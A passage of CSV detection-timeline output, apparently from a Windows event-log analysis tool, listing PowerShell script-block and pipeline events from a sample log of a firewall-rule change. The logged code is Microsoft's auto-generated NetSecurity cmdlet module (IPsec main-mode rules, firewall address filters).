${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletiza",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"tion_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecMainModeRule' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"tion_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecMainModeRule' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
2021-04-23 19:09:44.865 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
2021-04-23 19:09:44.865 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
2021-04-23 19:09:44.867 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
2021-04-23 19:09:44.868 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
2021-04-23 19:09:44.869 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
2021-04-23 19:09:44.870 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
2021-04-23 19:09:44.870 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
2021-04-23 19:09:44.871 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
2021-04-23 19:09:44.872 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
2021-04-23 19:09:44.873 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
2021-04-23 19:09:44.926 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetAddressFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] 